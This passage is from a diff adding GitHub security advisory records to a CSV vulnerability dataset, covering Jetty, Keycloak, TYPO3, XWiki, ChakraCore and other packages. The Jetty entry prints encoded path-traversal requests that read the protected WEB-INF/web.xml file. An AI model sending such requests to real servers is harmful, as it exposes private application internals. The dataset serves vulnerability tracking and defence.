'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-19.04.html'}, {'type': 'WEB', 'url': 'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-19.10.html'}, {'type': 'WEB', 'url': 'https://documentation.centreon.com/docs/centreon/en/latest/release_notes/centreon-2.8.html'}, {'type': 'WEB', 'url': 'https://github.com/TheCyberGeek/CVE-2019-16405.rb'}, {'type': 'PACKAGE', 'url': 'https://github.com/centreon/centreon'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/releases/tag/19.04.5'}, {'type': 'WEB', 'url': 'https://thecybergeek.co.uk/cves/2019/09/17/CVE-2019-16405-06.html'}, {'type': 'WEB', 'url': 'https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/155999/Centreon-19.04-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:34:21Z', 'nvd_published_at': '2019-11-21T18:15:00Z'}"
+1.4.0,GHSA-2vp8-jv5v-6qh6,2021-07-14T19:41:44Z,2021-07-13T17:43:23Z,,['CVE-2021-3637'],Allocation of resources without limits or throttling in keycloak-model-infinispan,A flaw was found in keycloak-model-infinispan in keycloak versions before 14.0.0 where authenticationSessions map in RootAuthenticationSessionEntity grows boundlessly which could lead to a DoS attack.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-model-infinispan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3637'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1979638'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T16:20:30Z', 'nvd_published_at': '2021-07-09T11:15:00Z'}"
+1.4.0,GHSA-vjv5-gp2w-65vm,2022-04-19T15:15:34Z,2021-07-19T15:15:24Z,,['CVE-2021-34429'],Encoded URIs can access WEB-INF directory in Eclipse Jetty,"### Description
+URIs can be crafted using some encoded characters to access the content of the `WEB-INF` directory and/or bypass some security constraints.
+This is a variation of the vulnerability reported in [CVE-2021-28164](https://nvd.nist.gov/vuln/detail/CVE-2021-28164)/[GHSA-v7ff-8wcx-gmc5](https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5).
+
+### Impact
+The default compliance mode allows requests with URIs that contain a %u002e segment to access protected resources within the WEB-INF directory. For example, a request to `/%u002e/WEB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. Similarly, an encoded null character can prevent correct normalization so that /.%00/WEB-INF/web.xml cal also retrieve the web.xml file.
+
+### Workarounds
+Some Jetty [rewrite rules](https://www.eclipse.org/jetty/documentation/jetty-9/index.html#rewrite-handler) can be deployed to rewrite any request containing encoded dot segments or null characters in the raw request URI, to a known not found resource:
+```xml
+
+
+
+ .*/(?:\.+/)+.*
+ /WEB-INF/Not-Found
+
+
+
+
+
+
+
+
+```
+
+### Analysis
+Prior to 9.4.37, Jetty was protected from this style of attack by two lines of defense:
+ + URIs were decoded first and then normalized for `.` and `..` sequences. Whilst this is not according to the RFC, it did remove relative segments that were encoded or parameterized and made the resulting URI paths safe from any repeated normalization (often done by URI manipulation and file system mapping).
+ + The `FileResource` class treated any difference between absolute path and canonical path of a resource as an alias, and thus the resource would not be served by default.
+
+Prior to 9.4.37, the `FileResource` class was replaced by the `PathResource` class that did not treat normalization differences as aliases. Then release 9.4.37 updated the URI parsing to be compliant with the RFC, in that normalization is done before decoding. This allowed various encodings or adornments to relative path segments that would not be normalized by the pure RFC URI normalization, but were normalized by the file system, thus allowing protected resources to be accessed via an alias. Specifically by decoding URIs after normalization, it left them vulnerable to any subsequent normalization (potentially after checking security constraints) changing the URI singificantly. Such extra normalization is often down by URI manipulation code and file systems.
+
+With Jetty releases 9.4.43, 10.0.6, 11.0.6, we have restored several lines of defense:
+ + URIs are first decoded and then normalized which is not strictly according to the current RFC. Since the normalization is done after decoding, the URI paths produced are safe from further normalisation and the referenced resource cannot easily be so changed after passing security constraints.
+ + During URI parsing checks are made for some specific segments/characters that are possible to be seen ambiguously by an application (e.g. encode dot segments, encoded separators, empty segments, parameterized dot segments and/or null characters). So even though Jetty code handles these URIs correctly, there is a risk that an application may not do so, thus such requests are rejected with a 400 Bad Request unless a specific compliance mode is set.
+ + Once decoded and normalized by initial URI processing, Jetty will not decode or normalize a received URI again within its own resource handling. This avoids to possibility of double decode attacks.
+ + The `ContextHandler.getResource(String path)` method always checks that the passed path is normalized, only accepting a non normal path if approved by an AliasChecker. This is the method that is directly used by Jetty resource serving.
+ + The API methods like `ServletContext.getResource(String path)` will normalize the prior to calling `ContextHandler.getResource(String path)`. This allows applications to use non normal paths.
+ + The `PathResource` class now considers any difference in normal/canonical name between a request resource name and the found resource name to be an alias, which will only be served if approved by an explicit `AliasChecker`
+
+In summary, the defense is a front line of detection of specific known URI alias attacks, with the last line defense of not allowing any aliasing of resources.
+
+Many thanks to @cangqingzhe from @CloverSecLabs for reporting this issue. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.37'}, {'fixed': '9.4.43'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.1'}, {'fixed': '10.0.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.1'}, {'fixed': '11.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34429'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.43.v20210629'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02f940c27e997a277ff14e79e84551382e1081e8978b417e0c2b0857@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0626f279ebf65506110a897e3a57ccd4072803ee5434b2503e070398@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2e32390cb7aedb39069e5b18aa130ca53e766258518faee63c31d3ea@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3aefe613abce594c71ace50088d2529bbde65d08b8e7ff2c2723aaa1@%3Cdev.santuario.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r44ea39ca8110de7353bfec88f58aa3aa58a42bb324b8772512ee190c@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46900f74dbb7d168aeac43bf0e7f64825376bb7eb74d31a5b33344ce@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46f748c1dc9cf9b6c1c18f6b5bfc3a869907f68f72e17666f2f30f24@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4727d282b5c2d951057845a46065d59f6e33132edc0a14f41c26b01e@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r48a93f2bc025acd7c7e341ed3864bfdeb75f0c768d41bc247e1a1f63@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5678d994d4dd8e7c838eed3bbc1a83a7f6bc62724b0cce67e8892a45@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r679d96f981d4c92724090ed2d5e8565a1d655a72bb315550489f052e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6e6f50c1ce1fb592cb43e913f5be23df104d50751465f8f1952ace0c@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r721ab6a5fa8d45bec76714b674f5d4caed2ebfeca69ad1d6d4caae6c@%3Cdev.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74fdc446df551fe89a0a16957a1bfdaad19380e0c1afd30625685a9c@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r756443e9d50af7e8c3df82e2c45105f452c8e8195ddbc0c00f58d5fe@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r833a4c8bdbbfeb8a2cd38238e7b59f83edd5c1a0e508b587fc551a46@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d245c6c884bbc804a472116d730c1a01676bf24f93206a34923fc64@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9e6158d72ef25077c2dc59fbddade2eacf7d259a2556c97a989f2fe8@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb33d65c3e5686f2e3b9bb8a032a44163b2f2ad9d31a8727338f213c1@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc26807be68748b3347decdcd03ae183622244b0b4cb09223d4b7e500@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcb157f55b9ae41b3076801de927c6fca1669c6d8eaf11a9df5dbeb46@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re01890eef49d4201018f2c97e26536e3e75f441ecdbcf91986c3bc17@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3de01414ccf682fe0951205f806dd8e94440798fd64c55a4941de3e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re5e9bb535db779506013ef8799dc2a299e77cdad6668aa94c456dba6@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re850203ef8700cb826534dd4a1cb9f5b07bb8f6f973b39ff7838d3ba@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210819-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-200', 'CWE-551', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T21:33:21Z', 'nvd_published_at': '2021-07-15T17:15:00Z'}"
+1.4.0,GHSA-h86x-mv66-gr5q,2021-07-26T19:28:18Z,2021-07-26T21:21:43Z,,['CVE-2020-13619'],OS Command Injection in Locutus,php/exec/escapeshellarg in Locutus PHP through 2.0.11 allows an attacker to achieve code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'locutus'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13619'}, {'type': 'WEB', 'url': 'https://locutus.io/php/'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20230521185837/https://reallinkers.github.io/CVE-2020-13619/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/locutus'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T19:28:18Z', 'nvd_published_at': '2020-07-01T17:15:00Z'}"
+1.4.0,GHSA-34fr-fhqr-7235,2021-08-31T21:23:03Z,2021-07-26T21:16:28Z,,['CVE-2021-32767'],Information Disclosure in User Authentication,"> ### Meta
+> * CVSS: `AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N/E:F/RL:O/RC:C` (4.9)
+
+### Problem
+It has been discovered that user credentials have been logged as plaintext when explicitly using log level debug, which is not the _default_ configuration.
+
+### Solution
+Update to TYPO3 versions 7.6.52 ELTS, 8.7.41 ELTS, 9.5.28, 10.4.18, 11.3.1 that fix the problem described.
+
+### Credits
+Thanks to Ingo Schmitt who reported this issue, and to TYPO3 core & security team member Benni Mack who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-012](https://typo3.org/security/advisory/typo3-core-sa-2021-012)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.52'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.41'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-34fr-fhqr-7235'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-34fr-fhqr-7235'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32767'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/0b4950163b8919451964133febc65bcdfcec721c'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-012'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-013'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T20:24:00Z', 'nvd_published_at': '2021-07-20T16:15:00Z'}"
+1.4.0,GHSA-3fxp-vwxm-2r5p,2021-08-03T18:58:25Z,2021-07-26T21:23:35Z,,['CVE-2021-23412'],Command injection in gitlogplus,"All versions of package gitlogplus are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'gitlogplus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23412'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/808942'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GITLOGPLUS-1315832'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/gitlogplus'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:27:36Z', 'nvd_published_at': '2021-07-23T16:15:00Z'}"
+1.4.0,GHSA-cv9j-78f7-w6v9,2021-07-28T19:21:31Z,2021-07-26T21:41:22Z,,['CVE-2020-25025'],Incorrect Authorization in TYPO3 extension,"The l10nmgr (aka Localization Manager) extension before 7.4.0, 8.x before 8.7.0, and 9.x before 9.2.0 for TYPO3 allows Information Disclosure (translatable fields).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'localizationteam/l10nmgr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.4.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'localizationteam/l10nmgr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'localizationteam/l10nmgr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25025'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-016'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:51:12Z', 'nvd_published_at': '2020-09-02T17:15:00Z'}"
+1.4.0,GHSA-qwmj-72mp-q3m2,2021-07-28T19:17:48Z,2021-07-26T21:34:58Z,,['CVE-2020-12700'],Missing Authorization in TYPO3 extension,The direct_mail extension through 5.2.3 for TYPO3 allows Information Disclosure via a newsletter subscriber data Special Query.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'directmailteam/direct-mail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12700'}, {'type': 'WEB', 'url': 'https://typo3.org/help/security-advisories'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2020-005'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:04:06Z', 'nvd_published_at': '2020-05-13T13:15:00Z'}"
+1.4.0,GHSA-hxxp-6546-wv6r,2022-12-15T18:33:24Z,2021-07-02T18:36:13Z,,['CVE-2021-21672'],XXE vulnerability in Jenkins Selenium HTML report Plugin,"Selenium HTML report Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
+
+This allows attackers with the ability to control the report files parsed using this plugin to have Jenkins parse a crafted report file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
+
+Selenium HTML report Plugin 1.1 disables external entity resolution for its XML parser.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:seleniumhtmlreport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21672'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/seleniumhtmlreport-plugin/commit/5ca59b8c7d23af4450dc7f19c1b4107d59063ae1'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/seleniumhtmlreport-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-06-30/#SECURITY-2329'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/06/30/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2022/04/14/2'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T20:14:49Z', 'nvd_published_at': '2021-06-30T17:15:00Z'}"
+1.4.0,GHSA-g644-6fg4-hrh9,2021-07-27T14:02:34Z,2021-07-28T18:57:47Z,,['CVE-2020-0830'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0830'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0830'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:02:34Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-86gw-g9jv-8vfg,2021-07-27T13:56:56Z,2021-07-28T18:57:55Z,,['CVE-2020-0833'], Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0833'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0833'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T13:56:56Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-v9j2-q4q5-cxh4,2021-07-02T16:41:31Z,2021-07-02T19:19:13Z,,['CVE-2021-32730'],No CSRF protection on the password change form,"### Impact
+It's possible for forge an URL that, when accessed by an admin, will reset the password of any user in XWiki.
+
+### Patches
+The problem has been patched in XWiki 12.10.5, 13.2RC1.
+
+### Workarounds
+It's possible to apply the patch manually by modifying the `register_macros.vm` template like in https://github.com/xwiki/xwiki-platform/commit/0a36dbcc5421d450366580217a47cc44d32f7257.
+
+### References
+https://jira.xwiki.org/browse/XWIKI-18315
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Jira XWiki](https://jira.xwiki.org)
+* Email us at [security ML](mailto:security@xwiki.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.0'}, {'fixed': '13.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-v9j2-q4q5-cxh4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32730'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/0a36dbcc5421d450366580217a47cc44d32f7257'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-18315'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:41:31Z', 'nvd_published_at': '2021-07-01T18:15:00Z'}"
+1.4.0,GHSA-7f53-fmmv-mfjv,2021-06-10T14:10:51Z,2021-07-20T17:33:28Z,,['CVE-2020-1920'],Regular expression denial of service in react-native,"A regular expression denial of service (ReDoS) vulnerability in the validateBaseUrl function can cause the application to use excessive resources, become unresponsive, or crash. This was introduced in react-native version 0.59.0 and fixed in version 0.64.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-native'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.59.0'}, {'fixed': '0.62.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'react-native'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.63.0'}, {'fixed': '0.64.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1920'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react-native/commit/ca09ae82715e33c9ac77b3fa55495cf84ba891c7'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react-native/releases/tag/v0.62.3'}, {'type': 'WEB', 'url': 'https://github.com/facebook/react-native/releases/tag/v0.64.1'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-293-redos-react-native/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/react-native'}]","{'cwe_ids': ['CWE-400', 'CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-02T19:22:39Z', 'nvd_published_at': '2021-06-01T14:15:00Z'}"
